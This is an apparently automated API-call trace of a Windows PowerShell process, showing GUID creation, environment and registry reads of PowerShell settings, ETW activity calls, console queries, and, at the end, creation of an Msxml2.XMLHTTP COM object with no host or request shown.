	[0051.690] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0x747a431e, Data2=0xebe5, Data3=0x4740, Data4=([0]=0xbb, [1]=0x12, [2]=0x4, [3]=0xde, [4]=0xb3, [5]=0x34, [6]=0x18, [7]=0xcd))) returned 0x0
	[0051.731] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x15046ff0000
	[0051.735] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0xccdaf11e, Data2=0x3203, Data3=0x4f6d, Data4=([0]=0xba, [1]=0xda, [2]=0x39, [3]=0x2c, [4]=0x2, [5]=0x19, [6]=0x8e, [7]=0xef))) returned 0x0
	[0051.735] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0x7854672f, Data2=0x966a, Data3=0x4cca, Data4=([0]=0xa3, [1]=0x6, [2]=0x20, [3]=0xcc, [4]=0xd6, [5]=0xc9, [6]=0xc1, [7]=0x1c))) returned 0x0
	[0051.735] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0x776c5bc6, Data2=0x686a, Data3=0x4899, Data4=([0]=0xb4, [1]=0x8b, [2]=0x92, [3]=0x47, [4]=0xdf, [5]=0xd4, [6]=0x97, [7]=0xeb))) returned 0x0
	[0051.739] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0x68788ffb, Data2=0x91f7, Data3=0x42b8, Data4=([0]=0xaf, [1]=0x13, [2]=0xad, [3]=0x2b, [4]=0xf1, [5]=0xa6, [6]=0x6c, [7]=0xa7))) returned 0x0
	[0051.757] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdda70
	[0051.757] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbdda70, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0051.757] CoTaskMemFree (pv=0x1505fbdda70) 
	[0051.760] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18b438*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b438*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x21, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.760] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b340*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b340*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.760] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x21, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x21, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.820] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x21, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.820] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9ab0
	[0051.820] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd9ab0, nSize=0x10a | out: lpBuffer="Ȇ") returned 0x0
	[0051.820] CoTaskMemFree (pv=0x1505fbd9ab0) 
	[0051.820] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18b438*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b438*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x22, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.820] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b340*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b340*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x21, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.821] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x22, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x22, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.821] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x22, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.821] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdbcb0
	[0051.821] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbdbcb0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0051.821] CoTaskMemFree (pv=0x1505fbdbcb0) 
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18b438*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b438*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x23, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b340*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b340*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x22, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x23, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x23, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x23, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.822] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd67b0
	[0051.822] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd67b0, nSize=0x10a | out: lpBuffer="\x3a4") returned 0x0
	[0051.822] CoTaskMemFree (pv=0x1505fbd67b0) 
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18b438*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b438*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x24, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b340*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b340*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x23, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.822] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x24, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x24, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x24, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9ef0
	[0051.827] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd9ef0, nSize=0x10a | out: lpBuffer="C:\\Windows\\system32") returned 0x0
	[0051.827] CoTaskMemFree (pv=0x1505fbd9ef0) 
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18b438*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b438*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x25, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b340*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b340*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x24, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x25, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x25, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x25, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd5f30
	[0051.827] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd5f30, nSize=0x10a | out: lpBuffer="Ȇ") returned 0x0
	[0051.827] CoTaskMemFree (pv=0x1505fbd5f30) 
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18b438*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b438*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x26, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b340*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b340*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x25, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x26, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18b418*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x26, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.827] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18b380*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18b380*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x26, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.854] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.854] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.854] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x15047762338, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.854] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x150477626e0, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x15047762a60, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x15047762df8, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x150477631a0, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.855] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.856] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.856] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.856] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x15047763548, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.856] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.856] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d868 | out: phkResult=0x184c18d868*=0x6e0) returned 0x0
	[0051.856] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x0, lpcbData=0x184c18d8b0*=0x0 | out: lpType=0x184c18d8b8*=0x1, lpData=0x0, lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.856] RegQueryValueExW (in: hKey=0x6e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18d8b8, lpData=0x150477638c8, lpcbData=0x184c18d8b0*=0x56 | out: lpType=0x184c18d8b8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18d8b0*=0x56) returned 0x0
	[0051.856] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.856] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18dac0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18dac0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x26, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.856] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18db90*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18db90*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.856] SetEvent (hEvent=0x6b8) returned 1
	[0051.856] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18dc80*=0x6b8, lpdwindex=0x184c18da54 | out: lpdwindex=0x184c18da54) returned 0x0
	[0051.856] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdaff0
	[0051.856] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbdaff0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0051.856] CoTaskMemFree (pv=0x1505fbdaff0) 
	[0051.857] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28
	[0051.857] GetFileType (hFile=0x28) returned 0x2
	[0051.858] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x184c18dfb8 | out: lpConsoleScreenBufferInfo=0x184c18dfb8) returned 1
	[0051.861] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x184c18dfb8 | out: lpConsoleScreenBufferInfo=0x184c18dfb8) returned 1
	[0051.883] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18e3e8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e3e8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x27, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.883] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e2f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e2f0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.883] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18e3c8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x27, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18e3c8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x27, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.898] CLSIDFromProgID (in: lpszProgID="Msxml2.XMLHTTP", lpclsid=0x15047766190 | out: lpclsid=0x15047766190*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4))) returned 0x0
	[0051.937] CoGetClassObject (in: rclsid=0x1505fbe9cc8*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf895f5b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x184c18d728 | out: ppv=0x184c18d728*=0x7ffbf908c3e0) returned 0x0
	[0052.355] XMLHTTP:IUnknown:QueryInterface (in: This=0x7ffbf908c3e0, riid=0x7ffbf8983470*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x184c18d780 | out: ppvObject=0x184c18d780*=0x0) returned 0x80004002
	[0052.356] XMLHTTP:IClassFactory:CreateInstance (in: This=0x7ffbf908c3e0, pUnkOuter=0x0, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d730 | out: ppvObject=0x184c18d730*=0x150600057f0) returned 0x0
	[0052.362] XMLHTTP:IUnknown:Release (This=0x7ffbf908c3e0) returned 0x1
	[0052.362] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d590 | out: ppvObject=0x184c18d590*=0x150600057f0) returned 0x0
